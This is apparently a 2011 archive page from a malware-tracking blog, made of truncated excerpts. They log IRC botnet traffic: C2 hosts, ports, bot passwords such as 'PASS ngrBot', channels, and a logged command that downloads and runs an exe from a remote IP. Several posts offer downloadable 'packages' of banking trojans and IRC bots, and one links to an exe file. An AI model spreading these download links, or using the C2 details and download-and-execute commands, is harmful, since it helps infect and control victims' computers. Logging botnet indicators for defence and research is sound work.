Month: April 2011

* Dns resolving up.scorevidic.net – * Dns resolved up.scorevidic.net to 173.246.103.19 – * Dns resolving av.psybnc.cz – * Dns resolved av.psybnc.cz to 173.246.103.19 – * Dns resolving av.shannen.cc – * Dns resolved av.shannen.cc to 173.246.103.19 173.246.103.19 3211 173.246.103.19 4949 173.246.103.19 5900 Remote Host Port Number 173.246.103.19 4949 PASS ngrBot 194.28.44.217 80 213.251.170.52 80 216.45.58.150 80Read more...

This is big package with diferent malwares like banking trojans,irc bots,trojan downloaders in diferent languages Download: http://a5181c44.tinylinks.co

Remote Host Port Number 208.98.40.230 3211 PASS google_cache2.tmp NICK n[DvLz-USA|XP]294793 USER 1810 “” “TsGh” :1810 PONG :9FCB5175 JOIN #DvLz DvLz# PONG :Irc.D3v1Lz.Com * Now talking in #DvLz * Topic is ‘!Msn http://www.youtubes.ca/watch.php?v=OnLhzs7d0E8 ‘ * Set by Sh on Wed Apr 13 20:50:32 infos about hosting: http://whois.domaintools.com/208.98.40.230

Remote Host Port Number 206.41.117.188 3921 PASS internet_csche2.tmp NICK {NeW}-[USA|XP][618943] USER 6189 “” “TsGh” :6189 JOIN #test bz infos about hosting: http://whois.domaintools.com/206.41.117.188

Some features: Start/Install windows service: This executable starts a windows service. Services have the highest level of privilege in Windows, and are thus useful for a number of malicious purposes. Load driver: This executable loads a driver into the windows kernel. Device drivers are used by advanced malware (rootkits) to operate stealthily and escape detection.Read more...

Remote Host Port Number 67.159.63.23 6464 NICK {XPUSA900275} PONG z3k4nt.audigier.Mx USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA900275} -ix JOIN #z3k4nt2 MODE #z3k4nt2 -ix UPDATE: NICK {XPUSA830783} PONG z3k4nt.audigier.Mx USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA830783} -ix JOIN #z3k4nt3 MODE #z3k4nt3 -ix infos about hosting: http://whois.domaintools.com/67.159.63.23

* Dns resolving haso.dukatlgg.com – * Dns resolved haso.dukatlgg.com to 72.20.30.119 – * Dns resolving matea.dukatlgg.com – * Dns resolved matea.dukatlgg.com to 72.20.30.119 Dns resolved haso.dukatlgg.com to 67.159.63.63 Remote Host Port Number 213.251.170.52 80 70.38.98.234 80 70.38.98.237 80 70.38.98.238 80 72.20.30.119 8888 PASS ngrBot PRIVMSG #msn :[MSN]: Updated MSN spread message to “hahah.. your photo?Read more...

this is another package with diferent malwares mostly irc bots banking trojans etc Download: http://0cc80bc0.goneviral.com

Remote Host Port Number 213.251.170.52 80 64.62.181.43 80 77.79.4.159 1866 PASS ngrBot or PASS xxx NICK n{US|XPa}mhewugg USER mhewugg 0 0 :mhewugg JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4” PRIVMSG #!hot! :[d=”http://64.62.181.43/dalnets/gaylord.exe” s=”94720 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” –Read more...

fafaffy.no-ip.biz 71.170.141.132 Outgoing connection to remote server: fafaffy.no-ip.biz TCP port 517 exe file: http://01dd3f31.goneviral.com infos about hecker: http://whois.domaintools.com/71.170.141.132